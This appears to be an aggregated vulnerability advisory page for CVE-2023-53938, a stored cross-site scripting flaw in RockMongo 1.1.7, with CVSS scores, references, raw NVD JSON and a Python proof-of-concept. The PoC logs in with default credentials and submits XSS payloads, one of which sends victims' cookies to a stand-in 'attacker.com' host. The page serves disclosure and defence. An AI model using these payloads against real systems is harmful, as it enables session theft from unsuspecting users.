CVE-2023-53938

Description

RockMongo 1.1.7 contains a stored cross-site scripting vulnerability that allows attackers to inject malicious scripts through multiple unencoded input parameters. Attackers can exploit the vulnerability by submitting crafted payloads in database, collection, and login parameters to execute arbitrary JavaScript in victim's browser.

CVSS Details

CVSS Score

5.4

Severity

MEDIUM

CVSS Vector

CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:C/C:L/I:L/A:N

Configurations (Affected Products)

cpe:2.3:a:rockmongo:rockmongo:1.1.7:*:*:*:*:*:*:* - VULNERABLE

RockMongo 1.1.7

PoC / Exploit Code

⚠ For Security Research Only

The following code is for security research and authorized testing only.

python

import requests
import sys

# CVE-2023-53938 PoC - RockMongo 1.1.7 Stored XSS
# Target: RockMongo 1.1.7
# Vulnerability: Stored XSS via multiple unencoded input parameters

TARGET_URL = "http://target:port/rockmongo/index.php"
USERNAME = "admin"
PASSWORD = "admin"

# XSS Payloads for different parameters
PAYLOADS = {
    "database_name": "<script>alert(document.cookie)</script>",
    "collection_name": "<img src=x onerror=alert('XSS')>",
    "login_username": "<script>fetch('http://attacker.com/steal?c='+document.cookie)</script>"
}

def exploit_stored_xss():
    """
    This PoC demonstrates how to inject malicious scripts through RockMongo parameters.
    The injected scripts will be stored and executed when other users view the affected pages.
    """
    session = requests.Session()
    
    # Step 1: Login to RockMongo
    login_data = {
        "username": USERNAME,
        "password": PASSWORD,
        "login": 1
    }
    
    # Inject XSS payload in login username field
    login_data["username"] = PAYLOADS["login_username"]
    
    try:
        response = session.post(TARGET_URL, data=login_data)
        print(f"[*] Payload sent via login parameter")
        print(f"[*] Payload: {PAYLOADS['login_username']}")
        print(f"[*] Status: {response.status_code}")
    except requests.exceptions.RequestException as e:
        print(f"[!] Request failed: {e}")
        sys.exit(1)

if __name__ == "__main__":
    print("=" * 60)
    print("CVE-2023-53938 PoC - RockMongo Stored XSS")
    print("=" * 60)
    exploit_stored_xss()

References

[1] CVE.org https://www.cve.org/CVERecord?id=CVE-2023-53938
[2] NVD NIST https://nvd.nist.gov/vuln/detail/CVE-2023-53938
[3] CVE Details https://www.cvedetails.com/cve/CVE-2023-53938/
[4] VulDB https://vuldb.com/cve/CVE-2023-53938
[5] https://github.com/iwind/rockmongo/
[6] https://www.exploit-db.com/exploits/51437
[7] https://www.vulncheck.com/advisories/rockmongo-stored-cross-site-scripting-vulnerability-via-multiple-parameters
[8] https://www.exploit-db.com/exploits/51437

Raw JSON Data

JSON

{"cve": {"id": "CVE-2023-53938", "sourceIdentifier": "[email protected]", "published": "2025-12-18T20:15:52.160", "lastModified": "2025-12-31T17:20:39.130", "vulnStatus": "Analyzed", "cveTags": [], "descriptions": [{"lang": "en", "value": "RockMongo 1.1.7 contains a stored cross-site scripting vulnerability that allows attackers to inject malicious scripts through multiple unencoded input parameters. Attackers can exploit the vulnerability by submitting crafted payloads in database, collection, and login parameters to execute arbitrary JavaScript in victim's browser."}], "metrics": {"cvssMetricV40": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "4.0", "vectorString": "CVSS:4.0/AV:N/AC:L/AT:N/PR:L/UI:P/VC:L/VI:L/VA:N/SC:L/SI:L/SA:N/E:X/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X", "baseScore": 5.1, "baseSeverity": "MEDIUM", "attackVector": "NETWORK", "attackComplexity": "LOW", "attackRequirements": "NONE", "privilegesRequired": "LOW", "userInteraction": "PASSIVE", "vulnConfidentialityImpact": "LOW", "vulnIntegrityImpact": "LOW", "vulnAvailabilityImpact": "NONE", "subConfidentialityImpact": "LOW", "subIntegrityImpact": "LOW", "subAvailabilityImpact": "NONE", "exploitMaturity": "NOT_DEFINED", "confidentialityRequirement": "NOT_DEFINED", "integrityRequirement": "NOT_DEFINED", "availabilityRequirement": "NOT_DEFINED", "modifiedAttackVector": "NOT_DEFINED", "modifiedAttackComplexity": "NOT_DEFINED", "modifiedAttackRequirements": "NOT_DEFINED", "modifiedPrivilegesRequired": "NOT_DEFINED", "modifiedUserInteraction": "NOT_DEFINED", "modifiedVulnConfidentialityImpact": "NOT_DEFINED", "modifiedVulnIntegrityImpact": "NOT_DEFINED", "modifiedVulnAvailabilityImpact": "NOT_DEFINED", "modifiedSubConfidentialityImpact": "NOT_DEFINED", "modifiedSubIntegrityImpact": "NOT_DEFINED", "modifiedSubAvailabilityImpact": "NOT_DEFINED", "Safety": "NOT_DEFINED", "Automatable": "NOT_DEFINED", "Recovery": "NOT_DEFINED", "valueDensity": "NOT_DEFINED", "vulnerabilityResponseEffort": "NOT_DEFINED", "providerUrgency": "NOT_DEFINED"}}], "cvssMetricV31": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:C/C:L/I:L/A:N", "baseScore": 5.4, "baseSeverity": "MEDIUM", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "LOW", "userInteraction": "REQUIRED", "scope": "CHANGED", "confidentialityImpact": "LOW", "integrityImpact": "LOW", "availabilityImpact": "NONE"}, "exploitabilityScore": 2.3, "impactScore": 2.7}]}, "weaknesses": [{"source": "[email protected]", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-79"}]}], "configurations": [{"nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:a:rockmongo:rockmongo:1.1.7:*:*:*:*:*:*:*", "matchCriteriaId": "FB4D40D8-A769-4898-B413-C60D8B250569"}]}]}], "references": [{"url": "https://github.com/iwind/rockmongo/", "source": "[email protected]", "tags": ["Product"]}, {"url": "https://www.exploit-db.com/exploits/51437", "source": "[email protected]", "tags": ["Exploit", "Third Party Advisory"]}, {"url": "https://www.vulncheck.com/advisories/rockmongo-stored-cross-site-scripting-vulnerability-via-multiple-parameters", "source": "[email protected]", "tags": ["Third Party Advisory"]}, {"url": "https://www.exploit-db.com/exploits/51437", "source": "134c704f-9b21-4f2e-91b3-4a467353bcc0", "tags": ["Exploit", "Third Party Advisory"]}]}}